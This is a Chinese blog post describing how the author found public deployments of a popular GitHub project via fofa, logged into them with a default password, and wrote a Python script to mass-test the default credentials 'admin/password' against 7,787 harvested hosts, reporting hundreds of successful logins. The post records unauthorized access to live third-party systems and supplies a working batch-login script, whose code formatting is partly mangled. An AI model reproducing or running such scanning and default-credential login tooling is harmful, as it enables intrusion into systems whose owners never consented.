github上4.1k项目--通用配置性错误实战

无意间发现个项目，在github上面有4.1k

具体这个可以干啥的，在下面有介绍

前天晚上也就是10号晚上，去fofa想找ARL资产的，但是出来的结果却不是ARL，无意间发现了这个

登录界面是这个样子的，然后右键查看源代码，发现线索

到网上乱找一气，找到了默认登录密码，怀揣和好奇的心情，输入进去，没想到直接进去了

一开始还以为是什么荒废的站点呢，但是看了看11号还有活动记录

然后开始激动了，使用fofa采集工具，直接找到了7787个样本

这么多数据，如果手工来一个一个验证的话，肯定是不可能的，所以直接写了脚本进行批量验证
使用post的时候，当data中传入的数据都是正确的时候，登录到后台界面的时候，直接找界面的特征数据来做判断就好了

python脚本代码：
import requests,os
def login(url):

# headers，伪造身份
headers = {
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '50'
}
data = 'next=&username=admin&password=password&remember=on'
try:
    res = requests.post(url=url,headers=headers,data=data).text
    if "注销" in res:
        print(url+'|OK')
    else:
        print(url+'|NO')
except Exception as e:
    pass

if name in ‘main‘:
for url in open(‘C:\Users\Dell\Desktop\ip1.txt’):
login(url.strip())
脚本编写的话，其实只需要把群公告里面的那个py基础爬虫花半小时看看学习一下子，就可以写出来了
目前验证出来的数据达到了数百个了